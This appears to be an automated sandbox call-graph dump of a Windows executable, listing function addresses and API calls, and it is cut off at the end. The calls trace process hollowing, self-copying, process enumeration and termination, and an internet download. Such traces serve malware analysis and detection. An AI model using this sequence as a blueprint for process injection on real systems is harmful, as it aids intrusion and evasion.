14744->14745 14746 7ff68a18b45b 14744->14746 14747 7ff68a18b442 14745->14747 14748 7ff68a18b319 14745->14748 14749 7ff68a19ae68 70 API calls 14746->14749 14750 7ff68a19ae30 _RunAllParam 70 API calls 14747->14750 14752 7ff68a18b44e 14748->14752 14753 7ff68a18b33b 14748->14753 14756 7ff68a18b349 _expandlocale 14748->14756 14751 7ff68a18b468 14749->14751 14750->14752 14754 7ff68a19ae30 _RunAllParam 70 API calls 14752->14754 14755 7ff68a184138 70 API calls 14753->14755 14753->14756 14754->14746 14755->14756 14756->14612 14758 7ff68a183e70 70 API calls 14757->14758 14759 7ff68a187ce6 14758->14759 14760 7ff68a189eb0 14759->14760 14761 7ff68a189f7e 14760->14761 14762 7ff68a189ed6 14760->14762 14763 7ff68a19ae30 _RunAllParam 70 API calls 14761->14763 14764 7ff68a189ee9 14762->14764 14765 7ff68a189f8a 14762->14765 14763->14765 14768 7ff68a184138 70 API calls 14764->14768 14769 7ff68a187d0b SHGetFolderPathW 14764->14769 14766 7ff68a19ae30 _RunAllParam 70 API calls 14765->14766 14767 7ff68a189f97 14766->14767 14768->14769 14769->14625 14769->14627 14771 7ff68a18a970 14770->14771 14775 7ff68a18a99d 14771->14775 14791 7ff68a183fb0 14771->14791 14772 7ff68a183d3c 70 API calls 14774 7ff68a18a9cb 14772->14774 14776 7ff68a183aa4 70 API calls 14774->14776 14775->14772 14777 7ff68a187d9a 14776->14777 14778 7ff68a18af64 14777->14778 14779 7ff68a183d3c 70 API calls 14778->14779 14780 7ff68a18af8f 14779->14780 14780->14633 14782 7ff68a18a7e3 14781->14782 14783 7ff68a18a726 14781->14783 14784 7ff68a19ae30 _RunAllParam 70 API calls 14782->14784 14785 7ff68a18a7ef 14783->14785 14786 7ff68a18a749 14783->14786 14790 7ff68a18a757 14783->14790 14784->14785 14787 7ff68a19ae30 _RunAllParam 70 API calls 14785->14787 14788 7ff68a184138 70 API calls 14786->14788 14786->14790 14789 7ff68a18a7fc 14787->14789 14788->14790 14790->14624 14792 7ff68a184079 14791->14792 14793 7ff68a183fe2 14791->14793 14795 7ff68a19ae30 _RunAllParam 70 API calls 14792->14795 14794 7ff68a183ff3 _expandlocale std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14793->14794 14796 7ff68a184138 70 API calls 14793->14796 14794->14775 14797 7ff68a184085 14795->14797 14796->14794 14799 7ff68a182a0a SHGetFolderPathW 14798->14799 14803 7ff68a182a03 _wsetlocale_nolock 14798->14803 14800 7ff68a182a2d SHGetFolderPathW 14799->14800 14799->14803 14800->14803 14801 7ff68a18bb20 _expandlocale 9 API calls 14802 7ff68a182abc 14801->14802 14802->14445 14802->14446 14803->14801 14805 7ff68a182b5c CreateDirectoryW 14804->14805 14807 7ff68a182bb9 14805->14807 14807->14807 14808 7ff68a182be4 CopyFileW 14807->14808 14809 7ff68a182c27 wcsncpy 14808->14809 14810 7ff68a18bb20 _expandlocale 9 API calls 14809->14810 14811 7ff68a182c5a 14810->14811 14811->14456 14813 7ff68a182ca8 14812->14813 14814 7ff68a182cb9 SHGetFolderPathW wsprintfW CoInitialize CoCreateInstance 14813->14814 14815 7ff68a182d8e CoUninitialize 14814->14815 14818 7ff68a182d25 14814->14818 14816 7ff68a18bb20 _expandlocale 9 API calls 14815->14816 14817 7ff68a182da5 14816->14817 14819 7ff68a18c770 14817->14819 14818->14815 14820 7ff68a182f1c 14819->14820 14821 7ff68a18c787 _expandlocale 14819->14821 14820->14462 14829 7ff68a1910c0 14821->14829 14824 7ff68a191104 _expandlocale 68 API calls 14825 7ff68a18c7b4 14824->14825 14825->14820 14826 7ff68a18c7cf 14825->14826 14827 7ff68a18fba4 _invoke_watson 15 API calls 14826->14827 14828 7ff68a18c7e4 14827->14828 14830 7ff68a19693c _calloc_impl 68 API calls 14829->14830 14831 7ff68a1910d5 14830->14831 14832 7ff68a18c79d 14831->14832 14833 7ff68a190908 _errno 68 API calls 14831->14833 14832->14820 14832->14824 14834 7ff68a1910e8 14833->14834 14834->14832 14835 7ff68a190908 _errno 68 API calls 14834->14835 14835->14832 14837 7ff68a1877db 14836->14837 14837->14837 14838 7ff68a1877f0 wsprintfA 14837->14838 14839 7ff68a18bb20 _expandlocale 9 API calls 14838->14839 14840 7ff68a187823 SHGetFolderPathA 14839->14840 14840->14468 14840->14471 14842 7ff68a181825 14841->14842 14843 7ff68a181871 14841->14843 14842->14843 14849 7ff68a18184c 14842->14849 14844 7ff68a1818fb 14843->14844 14845 7ff68a18187b 14843->14845 14846 7ff68a19ae30 _RunAllParam 70 API calls 14844->14846 14851 7ff68a18186f _expandlocale 14845->14851 14868 7ff68a181b50 14845->14868 14847 7ff68a181907 14846->14847 14852 7ff68a181990 14849->14852 14851->14473 14853 7ff68a181a8c 14852->14853 14854 7ff68a1819ba 14852->14854 14855 7ff68a19ae68 70 API calls 14853->14855 14856 7ff68a1819c9 14854->14856 14857 7ff68a1819f5 14854->14857 14858 7ff68a181a98 14855->14858 14856->14858 14859 7ff68a1819d7 14856->14859 14860 7ff68a181aa5 14857->14860 14861 7ff68a1819ff 14857->14861 14862 7ff68a19ae68 70 API calls 14858->14862 14874 7ff68a181ab4 14859->14874 14863 7ff68a19ae30 _RunAllParam 70 API calls 14860->14863 14866 7ff68a181b50 _RunAllParam 70 API calls 14861->14866 14867 7ff68a1819f3 _expandlocale 14861->14867 14862->14860 14865 7ff68a181ab2 14863->14865 14866->14867 14867->14851 14869 7ff68a181b89 14868->14869 14870 7ff68a18c51c std::_Facet_Register 70 API calls 14869->14870 14872 7ff68a181bd6 14869->14872 14873 7ff68a181be3 _expandlocale std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14869->14873 14870->14872 14871 7ff68a19adec std::_Xbad_alloc 2 API calls 14871->14873 14872->14871 14872->14873 14873->14851 14875 7ff68a181b42 14874->14875 14878 7ff68a181aca _expandlocale 14874->14878 14876 7ff68a19ae68 70 API calls 14875->14876 14877 7ff68a181b4e 14876->14877 14878->14867 14880 7ff68a18398a ExpandEnvironmentStringsW CreateFileW 14879->14880 14881 7ff68a18b88c CreateFileMappingA 14880->14881 14882 7ff68a18b8f6 MapViewOfFile 14881->14882 14883 7ff68a18b8c7 14881->14883 14885 7ff68a18b941 GetFileSize VirtualAlloc 14882->14885 14886 7ff68a18b917 14882->14886 14945 7ff68a181c54 14883->14945 14887 7ff68a18b98f _expandlocale 14885->14887 14888 7ff68a18b96b 14885->14888 14890 7ff68a181c54 70 API calls 14886->14890 14896 7ff68a18b99d UnmapViewOfFile CloseHandle 14887->14896 14891 7ff68a181c54 70 API calls 14888->14891 14893 7ff68a18b923 14890->14893 14894 7ff68a18b977 14891->14894 14897 7ff68a18b9c8 70 API calls 14893->14897 14899 7ff68a18b9c8 70 API calls 14894->14899 14906 7ff68a1839e3 14896->14906 14898 7ff68a18b92e 14897->14898 14901 7ff68a181688 70 API calls 14898->14901 14902 7ff68a18b982 14899->14902 14904 7ff68a18b936 CloseHandle 14901->14904 14905 7ff68a181688 70 API calls 14902->14905 14903 7ff68a18b8e6 CloseHandle 14903->14906 14904->14903 14905->14906 14906->14478 14906->14493 14908 7ff68a183304 _cftof2_l 14907->14908 14909 7ff68a183317 GetTempPathW GetTempFileNameW 14908->14909 14910 7ff68a183c1c 70 API calls 14909->14910 14911 7ff68a183366 14910->14911 14912 7ff68a183aa4 70 API calls 14911->14912 14913 7ff68a183377 RtlInitUnicodeString 14912->14913 14914 7ff68a195a30 _cftof2_l 14913->14914 14915 7ff68a1833b1 NtOpenFile 14914->14915 14916 7ff68a183417 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14915->14916 14917 7ff68a183430 type_info::operator== std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14915->14917 14918 7ff68a18bb20 _expandlocale 9 API calls 14916->14918 14917->14916 14920 7ff68a183485 NtSetInformationFile 14917->14920 14921 7ff68a1834ae NtWriteFile 14917->14921 14919 7ff68a18355d 14918->14919 14925 7ff68a183574 NtCreateSection 14919->14925 14920->14916 14920->14921 14922 7ff68a1834e7 GetLastError 14921->14922 14923 7ff68a1834ef type_info::operator== 14921->14923 14922->14916 14923->14916 14924 7ff68a183506 OpenProcess GetCurrentProcess DuplicateHandle 14923->14924 14924->14916 14926 7ff68a1835c1 14925->14926 14927 7ff68a1835c7 type_info::operator== 14925->14927 14928 7ff68a18bb20 _expandlocale 9 API calls 14926->14928 14929 7ff68a1835e2 NtClose 14927->14929 15017 7ff68a1831a4 14927->15017 14930 7ff68a18360d 14928->14930 14929->14926 14932 7ff68a183614 14930->14932 14933 7ff68a183661 wcsnlen _cftof2_l 14932->14933 14934 7ff68a1836ab GetModuleHandleA GetProcAddress 14933->14934 14935 7ff68a183829 14934->14935 14936 7ff68a1836f7 _cftof2_l 14934->14936 14937 7ff68a18bb20 _expandlocale 9 API calls 14935->14937 14938 7ff68a183706 CreateProcessInternalW 14936->14938 14939 7ff68a18383a VirtualFree 14937->14939 14938->14935 14940 7ff68a183770 NtMapViewOfSection 14938->14940 14939->14478 14941 7ff68a1837bb 14940->14941 14941->14935 15298 7ff68a1814e8 14941->15298 14944 7ff68a18381a ResumeThread 14944->14935 14946 7ff68a181c8f 14945->14946 14947 7ff68a181688 70 API calls 14946->14947 14952 7ff68a181cfc 14946->14952 14947->14952 14949 7ff68a181e70 14950 7ff68a181e82 14949->14950 14990 7ff68a181908 14949->14990 14953 7ff68a18b9c8 14950->14953 14952->14949 14971 7ff68a1812fc 14952->14971 14954 7ff68a18ba00 14953->14954 14955 7ff68a181688 70 API calls 14954->14955 14957 7ff68a18ba24 14954->14957 14955->14957 14956 7ff68a18bad4 14959 7ff68a18b8de 14956->14959 14960 7ff68a181908 70 API calls 14956->14960 14957->14956 14958 7ff68a1812fc 70 API calls 14957->14958 14958->14956 14961 7ff68a181688 14959->14961 14960->14959 14962 7ff68a1816bc 14961->14962 14968 7ff68a181721 14961->14968 15013 7ff68a181754 14962->15013 14964 7ff68a18bb20 _expandlocale 9 API calls 14965 7ff68a18174d 14964->14965 14965->14903 14967 7ff68a18170d 14967->14968 14969 7ff68a181908 70 API calls 14967->14969 14968->14964 14969->14968 14970 7ff68a1812fc 70 API calls 14970->14967 14972 7ff68a18133b 14971->14972 14973 7ff68a181312 14971->14973 14972->14949 14974 7ff68a190fe0 _CxxThrowException 2 API calls 14973->14974 14975 7ff68a181317 14973->14975 14974->14975 14976 7ff68a18132a 14975->14976 14994 7ff68a181244 14975->14994 14977 7ff68a181339 14976->14977 14980 7ff68a181244 70 API calls 14976->14980 14981 7ff68a181244 70 API calls 14977->14981 14979 7ff68a181362 14982 7ff68a190fe0 _CxxThrowException 2 API calls 14979->14982 14983 7ff68a18137f 14980->14983 14984 7ff68a18139c 14981->14984 14982->14976 14985 7ff68a190fe0 _CxxThrowException 2 API calls 14983->14985 14986 7ff68a190fe0 _CxxThrowException 2 API calls 14984->14986 14985->14977 14987 7ff68a1813ac 14986->14987 15000 7ff68a18bbdc 14987->15000 14991 7ff68a181928 14990->14991 14993 7ff68a181964 14990->14993 14992 7ff68a1812fc 70 API calls 14991->14992 14991->14993 14992->14993 14993->14950 14995 7ff68a18127a 14994->14995 14996 7ff68a181808 70 API calls 14995->14996 14997 7ff68a181294 14996->14997 14998 7ff68a18bb90 std::exception::exception 68 API calls 14997->14998 14999 7ff68a1812bb std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14998->14999 14999->14979 15003 7ff68a18bc18 15000->15003 15004 7ff68a1813c5 15003->15004 15005 7ff68a18bc2d 15003->15005 15004->14949 15009 7ff68a18bcf4 15005->15009 15008 7ff68a18bc98 std::exception::_Copy_str 68 API calls 15008->15004 15010 7ff68a18bd03 15009->15010 15011 7ff68a18bc32 15009->15011 15012 7ff68a18c9c8 free 68 API calls 15010->15012 15011->15004 15011->15008 15012->15011 15014 7ff68a181786 15013->15014 15015 7ff68a1816c9 15014->15015 15016 7ff68a181688 70 API calls 15014->15016 15015->14967 15015->14970 15016->15015 15025 7ff68a18c3a4 15017->15025 15020 7ff68a183229 15021 7ff68a1831f0 WriteFile SetFilePointer 15020->15021 15022 7ff68a18322e 15020->15022 15021->15020 15023 7ff68a18bb20 _expandlocale 9 API calls 15022->15023 15024 7ff68a18323b 15023->15024 15024->14929 15026 7ff68a18c3c9 15025->15026 15028 7ff68a18c3de wprintf 15025->15028 15027 7ff68a190908 _errno 68 API calls 15026->15027 15029 7ff68a18c3ce 15027->15029 15041 7ff68a18d6b8 15028->15041 15030 7ff68a18fb84 _invalid_parameter_noinfo 16 API calls 15029->15030 15032 7ff68a1831cc GetFileSize SetFilePointer 15030->15032 15032->15020 15033 7ff68a18c3f6 wprintf 15046 7ff68a18fc18 15033->15046 15035 7ff68a18c405 wprintf 15053 7ff68a18fce8 15035->15053 15037 7ff68a18c420 wprintf 15079 7ff68a18fbe0 15037->15079 15039 7ff68a18c432 wprintf 15083 7ff68a18d73c 15039->15083 15042 7ff68a18d6c6 15041->15042 15043 7ff68a18d6d9 EnterCriticalSection 15041->15043 15044 7ff68a193d0c _lock 68 API calls 15042->15044 15045 7ff68a18d6ce 15044->15045 15045->15033 15086 7ff68a193554 15046->15086 15050 7ff68a18fc90 15050->15035 15051 7ff68a18fc37 wprintf 15051->15050 15052 7ff68a18f740 _malloc_crt 68 API calls 15051->15052 15052->15050 15103 7ff68a18cc04 15053->15103 15056 7ff68a190908 _errno 68 API calls 15057 7ff68a18fd53 15056->15057 15111 7ff68a1938bc InitOnceExecuteOnce 15057->15111 15059 7ff68a190721 15064 7ff68a18bb20 _expandlocale 9 API calls 15059->15064 15060 7ff68a190908 _errno 68 API calls 15062 7ff68a190716 15060->15062 15061 7ff68a18fd5c 15061->15059 15063 7ff68a193554 _fileno 68 API calls 15061->15063 15069 7ff68a1906c7 15061->15069 15074 7ff68a18fd89 _output_s_l _cftof2_l 15061->15074 15066 7ff68a18fb84 _invalid_parameter_noinfo 16 API calls 15062->15066 15063->15074 15065 7ff68a19074b 15064->15065 15065->15037 15066->15059 15068 7ff68a190768 89 API calls write_char 15068->15074 15069->15060 15070 7ff68a190303 DecodePointer 15070->15074 15071 7ff68a18c9c8 free 68 API calls 15071->15074 15072 7ff68a18f740 _malloc_crt 68 API calls 15072->15074 15073 7ff68a193708 70 API calls _output_s_l 15073->15074 15074->15059 15074->15068 15074->15069 15074->15070 15074->15071 15074->15072 15074->15073 15075 7ff68a190358 DecodePointer 15074->15075 15076 7ff68a190378 DecodePointer 15074->15076 15077 7ff68a190804 89 API calls write_string 15074->15077 15078 7ff68a1907b0 89 API calls write_multi_char 15074->15078 15112 7ff68a19565c 15074->15112 15075->15074 15076->15074 15077->15074 15078->15074 15080 7ff68a18fbe4 15079->15080 15082 7ff68a18fbfd 15079->15082 15080->15082 15179 7ff68a18dd00 15080->15179 15082->15039 15084 7ff68a18d74e LeaveCriticalSection 15083->15084 15085 7ff68a18d741 15083->15085 15085->15084 15087 7ff68a18fc30 15086->15087 15088 7ff68a19355d 15086->15088 15092 7ff68a196a54 15087->15092 15089 7ff68a190908 _errno 68 API calls 15088->15089 15090 7ff68a193562 15089->15090 15091 7ff68a18fb84 _invalid_parameter_noinfo 16 API calls 15090->15091 15091->15087 15093 7ff68a196a6f 15092->15093 15094 7ff68a196a62 15092->15094 15102 7ff68a1938bc InitOnceExecuteOnce 15093->15102 15096 7ff68a190908 _errno 68 API calls 15094->15096 15098 7ff68a196a67 15096->15098 15097 7ff68a196a74 15097->15098 15099 7ff68a190908 _errno 68 API calls 15097->15099 15098->15051 15100 7ff68a196ab4 15099->15100 15101 7ff68a18fb84 _invalid_parameter_noinfo 16 API calls 15100->15101 15101->15098 15102->15097 15104 7ff68a18cc1a 15103->15104 15110 7ff68a18cc7b 15103->15110 15115 7ff68a191f68 15104->15115 15107 7ff68a18cc54 15107->15110 15134 7ff68a19186c 15107->15134 15110->15056 15111->15061 15113 7ff68a18cc04 _LocaleUpdate::_LocaleUpdate 68 API calls 15112->15113 15114 7ff68a19566e 15113->15114 15114->15074 15116 7ff68a191f8c _getptd_noexit 68 API calls 15115->15116 15118 7ff68a191f73 15116->15118 15117 7ff68a18cc1f 15117->15107 15120 7ff68a191474 15117->15120 15118->15117 15119 7ff68a18f30c __updatetlocinfo 68 API calls 15118->15119 15119->15117 15121 7ff68a191f68 _getptd 68 API calls 15120->15121 15122 7ff68a19147f 15121->15122 15123 7ff68a1914a8 15122->15123 15125 7ff68a19149a 15122->15125 15124 7ff68a193d0c _lock 68 API calls 15123->15124 15127 7ff68a1914b2 15124->15127 15126 7ff68a191f68 _getptd 68 API calls 15125->15126 15128 7ff68a19149f 15126->15128 15145 7ff68a1914ec 15127->15145 15132 7ff68a1914e0 15128->15132 15133 7ff68a18f30c __updatetlocinfo 68 API calls 15128->15133 15132->15107 15133->15132 15135 7ff68a191f68 _getptd 68 API calls 15134->15135 15136 7ff68a19187b 15135->15136 15137 7ff68a193d0c _lock 68 API calls 15136->15137 15138 7ff68a191896 15136->15138 15143 7ff68a1918a9 15137->15143 15140 7ff68a191918 15138->15140 15142 7ff68a18f30c __updatetlocinfo 68 API calls 15138->15142 15139 7ff68a1918df 15178 7ff68a193ef4 LeaveCriticalSection 15139->15178 15140->15110 15142->15140 15143->15139 15144 7ff68a18c9c8 free 68 API calls 15143->15144 15144->15139 15146 7ff68a1914fe _wsetlocale __addlocaleref 15145->15146 15147 7ff68a1914c6 15145->15147 15146->15147 15150 7ff68a191238 15146->15150 15149 7ff68a193ef4 LeaveCriticalSection 15147->15149 15151 7ff68a1912d4 15150->15151 15153 7ff68a19125b 15150->15153 15152 7ff68a191327 15151->15152 15154 7ff68a18c9c8 free 68 API calls 15151->15154 15157 7ff68a197998 __free_lc_time 68 API calls 15152->15157 15172 7ff68a191354 15152->15172 15153->15151 15155 7ff68a19129a 15153->15155 15163 7ff68a18c9c8 free 68 API calls 15153->15163 15156 7ff68a1912f8 15154->15156 15160 7ff68a1912bc 15155->15160 15169 7ff68a18c9c8 free 68 API calls 15155->15169 15159 7ff68a18c9c8 free 68 API calls 15156->15159 15158 7ff68a191348 15157->15158 15162 7ff68a18c9c8 free 68 API calls 15158->15162 15164 7ff68a19130c 15159->15164 15165 7ff68a18c9c8 free 68 API calls 15160->15165 15161 7ff68a1913b2 15162->15172 15167 7ff68a19128e 15163->15167 15168 7ff68a18c9c8 free 68 API calls 15164->15168 15166 7ff68a1912c8 15165->15166 15170 7ff68a18c9c8 free 68 API calls 15166->15170 15171 7ff68a197014 __free_lconv_mon 68 API calls 15167->15171 15173 7ff68a19131b 15168->15173 15174 7ff68a1912b0 15169->15174 15170->15151 15171->15155 15172->15161 15175 7ff68a18c9c8 68 API calls free 15172->15175 15176 7ff68a18c9c8 free 68 API calls 15173->15176 15177 7ff68a197640 __free_lconv_num 68 API calls 15174->15177 15175->15172 15176->15152 15177->15160 15180 7ff68a18dd42 15179->15180 15181 7ff68a18dd1d 15179->15181 15180->15082 15181->15180 15182 7ff68a193554 _fileno 68 API calls 15181->15182 15183 7ff68a18dd34 15182->15183 15185 7ff68a19452c 15183->15185 15186 7ff68a19454f 15185->15186 15187 7ff68a194567 15185->15187 15211 7ff68a190898 15186->15211 15214 7ff68a1938bc InitOnceExecuteOnce 15187->15214 15191 7ff68a190908 _errno 68 API calls 15192 7ff68a19455c 15191->15192 15192->15180 15193 7ff68a1945eb 15195 7ff68a190898 __doserrno 68 API calls 15193->15195 15194 7ff68a19456c 15194->15192 15194->15193 15196 7ff68a1945a6 15194->15196 15197 7ff68a1945f0 15195->15197 15215 7ff68a199fe4 15196->15215 15199 7ff68a190908 _errno 68 API calls 15197->15199 15201 7ff68a1945f8 15199->15201 15200 7ff68a1945ad 15202 7ff68a1945b9 15200->15202 15203 7ff68a1945ca 15200->15203 15204 7ff68a18fb84 _invalid_parameter_noinfo 16 API calls 15201->15204 15223 7ff68a194618 15202->15223 15206 7ff68a190908 _errno 68 API calls 15203->15206 15204->15192 15208 7ff68a1945cf 15206->15208 15207 7ff68a1945c6 15278 7ff68a19a45c LeaveCriticalSection 15207->15278 15209 7ff68a190898 __doserrno 68 API calls 15208->15209 15209->15207 15212 7ff68a191f8c _getptd_noexit 68 API calls 15211->15212 15213 7ff68a1908a1 15212->15213 15213->15191 15214->15194 15216 7ff68a19a04e EnterCriticalSection 15215->15216 15217 7ff68a19a01c 15215->15217 15216->15200 15218 7ff68a193d0c _lock 68 API calls 15217->15218 15219 7ff68a19a026 15218->15219 15220 7ff68a19a02e InitializeCriticalSectionAndSpinCount 15219->15220 15221 7ff68a19a044 15219->15221 15220->15221 15279 7ff68a193ef4 LeaveCriticalSection 15221->15279 15225 7ff68a19463a __crtLCMapStringA_stat 15223->15225 15224 7ff68a19466e 15226 7ff68a190898 __doserrno 68 API calls 15224->15226 15225->15224 15231 7ff68a194662 15225->15231 15280 7ff68a1938bc InitOnceExecuteOnce 15225->15280 15229 7ff68a194673 15226->15229 15227 7ff68a18bb20 _expandlocale 9 API calls 15230 7ff68a194d71 15227->15230 15233 7ff68a190908 _errno 68 API calls 15229->15233 15230->15207 15231->15227 15232 7ff68a194692 15232->15231 15234 7ff68a1946c1 15232->15234 15236 7ff68a1946ae GetStdHandle 15232->15236 15235 7ff68a19467a 15233->15235 15234->15224 15237 7ff68a194702 15234->15237 15238 7ff68a18fb84 _invalid_parameter_noinfo 16 API calls 15235->15238 15236->15234 15239 7ff68a194717 15237->15239 15281 7ff68a1943ac 15237->15281 15238->15231 15241 7ff68a196a54 _isatty 69 API calls 15239->15241 15242 7ff68a19471e 15241->15242 15243 7ff68a1949e2 15242->15243 15248 7ff68a191f68 _getptd 68 API calls 15242->15248 15244 7ff68a194cc4 WriteFile 15243->15244 15245 7ff68a1949f9 15243->15245 15246 7ff68a194cea GetLastError 15244->15246 15257 7ff68a1949af 15244->15257 15247 7ff68a194ad3 15245->15247 15252 7ff68a194a0b 15245->15252 15246->15257 15261 7ff68a194add 15247->15261 15271 7ff68a194bb2 15247->15271 15250 7ff68a194742 GetConsoleMode 15248->15250 15249 7ff68a194d22 15249->15231 15254 7ff68a190908 _errno 68 API calls 15249->15254 15250->15243 15251 7ff68a194777 15250->15251 15251->15243 15253 7ff68a194784 GetConsoleCP 15251->15253 15252->15249 15256 7ff68a194a55 WriteFile 15252->15256 15252->15257 15253->15257 15276 7ff68a19479e _write_nolock 15253->15276 15258 7ff68a194d49 15254->15258 15255 7ff68a194cfa 15259 7ff68a194cff 15255->15259 15260 7ff68a194d16 15255->15260 15256->15246 15256->15252 15257->15231 15257->15249 15257->15255 15263 7ff68a190898 __doserrno 68 API calls 15258->15263 15265 7ff68a190908 _errno 68 API calls 15259->15265 15293 7ff68a1908b8 15260->15293 15261->15249 15261->15257 15266 7ff68a194b34 WriteFile 15261->15266 15263->15231 15264 7ff68a194c02 WideCharToMultiByte 15264->15246 15264->15271 15267 7ff68a194d04 15265->15267 15266->15246 15266->15261 15270 7ff68a190898 __doserrno 68 API calls 15267->15270 15269 7ff68a194c53 WriteFile 15269->15271 15272 7ff68a194c9d GetLastError 15269->15272 15270->15231 15271->15249 15271->15257 15271->15264 15271->15269 15272->15271 15273 7ff68a194844 WideCharToMultiByte 15273->15257 15274 7ff68a194887 WriteFile 15273->15274 15274->15246 15274->15276 15275 7ff68a19a488 WriteConsoleW CreateFileW _write_nolock 15275->15276 15276->15246 15276->15257 15276->15273 15276->15275 15277 7ff68a1948e0 WriteFile 15276->15277 15290 7ff68a1956a0 15276->15290 15277->15246 15277->15276 15280->15232 15282 7ff68a19a328 _get_osfhandle 69 API calls 15281->15282 15283 7ff68a1943cb 15282->15283 15284 7ff68a1943d1 15283->15284 15285 7ff68a1943e2 SetFilePointerEx 15283->15285 15286 7ff68a190908 _errno 68 API calls 15284->15286 15287 7ff68a1943fa GetLastError 15285->15287 15289 7ff68a1943d6 15285->15289 15286->15289 15288 7ff68a1908b8 _dosmaperr 68 API calls 15287->15288 15288->15289 15289->15239 15291 7ff68a18cc04 _LocaleUpdate::_LocaleUpdate 68 API calls 15290->15291 15292 7ff68a1956b4 15291->15292 15292->15276 15294 7ff68a191f8c _getptd_noexit 68 API calls 15293->15294 15295 7ff68a1908c9 15294->15295 15296 7ff68a191f8c _getptd_noexit 68 API calls 15295->15296 15297 7ff68a1908e2 realloc 15296->15297 15297->15231 15299 7ff68a181520 15298->15299 15300 7ff68a18152c _cftof2_l 15299->15300 15301 7ff68a18156f _cftof2_l 15299->15301 15303 7ff68a18153c Wow64GetThreadContext 15300->15303 15302 7ff68a181581 GetThreadContext 15301->15302 15304 7ff68a1815d3 15302->15304 15305 7ff68a1815a4 SetThreadContext 15302->15305 15303->15304 15306 7ff68a18155b Wow64SetThreadContext 15303->15306 15308 7ff68a181c54 70 API calls 15304->15308 15307 7ff68a1815bc 15305->15307 15306->15307 15307->15304 15315 7ff68a181428 15307->15315 15310 7ff68a181628 15308->15310 15312 7ff68a18bb20 _expandlocale 9 API calls 15310->15312 15314 7ff68a181649 15312->15314 15313 7ff68a1815dc WriteProcessMemory 15313->15304 15313->15310 15314->14935 15314->14944 15316 7ff68a18144a _cftof2_l 15315->15316 15317 7ff68a181490 _cftof2_l 15315->15317 15318 7ff68a18145c Wow64GetThreadContext 15316->15318 15319 7ff68a1814a5 GetThreadContext 15317->15319 15320 7ff68a181483 15318->15320 15321 7ff68a181477 15318->15321 15319->15320 15322 7ff68a18bb20 _expandlocale 9 API calls 15320->15322 15323 7ff68a18c3a4 wprintf 96 API calls 15321->15323 15324 7ff68a1814df 15322->15324 15323->15320 15324->15304 15324->15313 15326 7ff68a183c1c 70 API calls 15325->15326 15327 7ff68a185765 15326->15327 15328 7ff68a183c1c 70 API calls 15327->15328 15329 7ff68a18578b 15328->15329 15330 7ff68a183c1c 70 API calls 15329->15330 15331 7ff68a1857ac 15330->15331 15332 7ff68a183c1c 70 API calls 15331->15332 15333 7ff68a1857cd 15332->15333 15334 7ff68a183c1c 70 API calls 15333->15334 15335 7ff68a1857f1 15334->15335 15336 7ff68a183c1c 70 API calls 15335->15336 15337 7ff68a185813 15336->15337 15338 7ff68a183c1c 70 API calls 15337->15338 15339 7ff68a185834 15338->15339 15340 7ff68a183c1c 70 API calls 15339->15340 15341 7ff68a185856 15340->15341 15342 7ff68a183c1c 70 API calls 15341->15342 15343 7ff68a185877 15342->15343 15344 7ff68a183c1c 70 API calls 15343->15344 15345 7ff68a18589f 15344->15345 15346 7ff68a183c1c 70 API calls 15345->15346 15347 7ff68a1858cf 15346->15347 15348 7ff68a183c1c 70 API calls 15347->15348 15349 7ff68a1858ff 15348->15349 15350 7ff68a183c1c 70 API calls 15349->15350 15351 7ff68a18592d 15350->15351 15352 7ff68a183c1c 70 API calls 15351->15352 15353 7ff68a18595a 15352->15353 15354 7ff68a183c1c 70 API calls 15353->15354 15355 7ff68a185987 15354->15355 15356 7ff68a183c1c 70 API calls 15355->15356 15357 7ff68a1859b4 15356->15357 15358 7ff68a183c1c 70 API calls 15357->15358 15359 7ff68a1859e1 15358->15359 15360 7ff68a183c1c 70 API calls 15359->15360 15361 7ff68a185a0e 15360->15361 15362 7ff68a183c1c 70 API calls 15361->15362 15363 7ff68a185a33 15362->15363 15365 7ff68a185a56 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 15363->15365 15633 7ff68a185324 15363->15633 15366 7ff68a18bb20 _expandlocale 9 API calls 15365->15366 15367 7ff68a185aa0 15366->15367 15367->14503 15369 7ff68a18735f InternetOpenW 15368->15369 15370 7ff68a187354 Sleep 15369->15370 15371 7ff68a187381 InternetOpenUrlW 15369->15371 15370->15369 15373 7ff68a1873b5 InternetOpenUrlW 15371->15373 15374 7ff68a187423 HttpQueryInfoA GetProcessHeap HeapAlloc 15371->15374 15373->15374 15376 7ff68a1873e4 InternetCloseHandle 15373->15376 15375 7ff68a187473 InternetCloseHandle 15374->15375 15379 7ff68a18747e 15374->15379 15375->15376 15381 7ff68a1873f4 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 15376->15381 15377 7ff68a1874a5 InternetReadFile 15377->15379 15380 7ff68a1874b4 InternetCloseHandle InternetCloseHandle 15377->15380 15379->15377 15379->15380 15380->15381 15382 7ff68a18bb20 _expandlocale 9 API calls 15381->15382 15383 7ff68a187515 15382->15383 15383->14509 15385 7ff68a185b8d 15384->15385 15386 7ff68a185b1a Process32FirstW 15384->15386 16273 7ff68a184f64 SHGetFolderPathW 15385->16273 15387 7ff68a185b32 _expandlocale 15386->15387 15389 7ff68a185b84 CloseHandle 15387->15389 15393 7ff68a185b46 OpenProcess 15387->15393 15394 7ff68a185b72 Process32NextW 15387->15394 15389->15385 15391 7ff68a18a920 70 API calls 15392 7ff68a185bb4 15391->15392 15395 7ff68a188e30 162 API calls 15392->15395 15393->15394 15396 7ff68a185b5e TerminateProcess CloseHandle 15393->15396 15394->15387 15397 7ff68a185c38 15395->15397 15396->15394 15398 7ff68a185c42 std::ios_base::_Ios_base_dtor 15397->15398 16294 7ff68a18b640 15397->16294 15401 7ff68a188f3c 96 API calls 15398->15401 15407 7ff68a1872b3 std::ios_base::_Ios_base_dtor 15401->15407 15402 7ff68a18a31c _RunAllParam 96 API calls 15403 7ff68a185ccc 15402->15403 15404 7ff68a185cfe 15403->15404 15405 7ff68a1812fc 70 API calls 15403->15405 15406 7ff68a183c1c 70 API calls 15404->15406 15405->15404 15409 7ff68a185d30 15406->15409 15410 7ff68a18bb20 _expandlocale 9 API calls 15407->15410 15408 7ff68a185d7c 15413 7ff68a183c1c 70 API calls 15408->15413 15409->15408 15412 7ff68a183d3c 70 API calls 15409->15412 15411 7ff68a1872fb CreateThread CreateThread 15410->15411 15411->14518 15412->15408 15414 